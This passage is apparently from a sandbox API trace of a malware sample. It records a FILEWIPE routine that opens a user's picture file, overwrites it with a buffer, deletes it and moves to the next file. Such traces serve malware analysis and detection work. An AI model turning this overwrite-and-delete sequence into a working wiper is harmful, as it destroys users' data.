hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.277] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.277] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.277] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0039.277] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.277] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.280] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.280] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.280] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.280] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0039.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.280] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.280] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46b1d10, ftCreationTime.dwHighDateTime=0x1d5bebe, ftLastAccessTime.dwLowDateTime=0x76997d50, ftLastAccessTime.dwHighDateTime=0x1d5c486, ftLastWriteTime.dwLowDateTime=0x76997d50, ftLastWriteTime.dwHighDateTime=0x1d5c486, nFileSizeHigh=0x0, nFileSizeLow=0x131c1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="61Ot9 dm-iOBUGP.jpg", cAlternateFileName="61OT9D~1.JPG")) returned 0x7c2100 [0039.280] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0039.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.281] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.281] CharLowerBuffW (in: lpsz="byte[78273]", cchLength=0xb | out: lpsz="byte[78273]") returned 0xb [0039.281] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.281] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.281] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.281] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.282] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.282] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.283] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.283] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.283] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.283] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.283] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.283] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.283] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.283] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.283] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.283] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.283] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\61ot9 dm-iobugp.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0039.284] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.285] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.285] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.285] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.286] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.286] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.287] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.288] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg", lpFilePart=0x0) returned 0x3a [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0039.288] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\61ot9 dm-iobugp.jpg")) returned 0x20 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0039.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.289] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46b1d10, ftCreationTime.dwHighDateTime=0x1d5bebe, ftLastAccessTime.dwLowDateTime=0x76997d50, ftLastAccessTime.dwHighDateTime=0x1d5c486, ftLastWriteTime.dwLowDateTime=0x171ecac0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x131c1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="61Ot9 dm-iOBUGP.jpg", cAlternateFileName="61OT9D~1.JPG")) returned 0x7c2100 [0039.289] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\61ot9 dm-iobugp.jpg")) returned 1 [0039.291] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46b1d10, ftCreationTime.dwHighDateTime=0x1d5bebe, 